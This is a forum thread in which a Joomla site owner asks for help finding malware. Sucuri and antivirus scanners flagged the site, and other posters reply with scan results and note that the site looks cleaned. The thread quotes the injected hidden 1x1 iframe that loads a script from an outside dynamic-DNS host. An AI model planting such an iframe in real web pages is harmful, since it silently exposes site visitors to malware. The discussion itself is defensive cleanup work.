Hi all,

Avast reported a JS injected files, i scanned my website http://showroom360.net with http://sitecheck.sucuri.net/results/showroom360.net and it reports that there’s a hidden frame :

Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src="http://kifacnfor.sytes.net/dezit/counter.php" width=1 height=1 style="visibility: hidden">

and

Known javascript malware. 
Details: http://sucuri.net/malware/malware-entry-mwjsanon7
<iframe src="http://kifacnfor.sytes.net/dezit/counter.php" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-fr" lang="fr-fr" > <script type="text/javascript">var _gaq = _gaq || [];

It’s a Joomla website, i searched in files but didn’t find this iFrame. Can you help please to locate it ?

Thanks for your help.

AVG detected some HTML:Framer during the last 30 days: http://www.avgthreatlabs.com/website-safety-reports/domain/showroom360.net/

Blacklisted by Kaspersky on Virustotal: https://www.virustotal.com/en/url/7c94eff79d91917d7edee8899661e3af977caab90522048f267351094871173c/analysis/1383581857/

Site has been cleansed see no flags there now. All seems fine.

Only code hick-up to look into:
showroom360 dot net/components/rsform/assets/js/script.js benign
[nothing detected] (script) showroom360 dot net/components/rsform/assets/js/script.js
status: (referer=showroom360 dot net/)saved 5307 bytes 90914dc644a7e591d8037b3703450d22f410897d
info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
info: [decodingLevel=0] found JavaScript
suspicious:

polonus

thx for your answers, what i can’t understand why there is always a malware detected by Sucuri : http://sitecheck.sucuri.net/results/showroom360.net ?

your Sucuri report was 2 days old http://sitecheck.sucuri.net/results/showroom360.net

but still outdated jomla…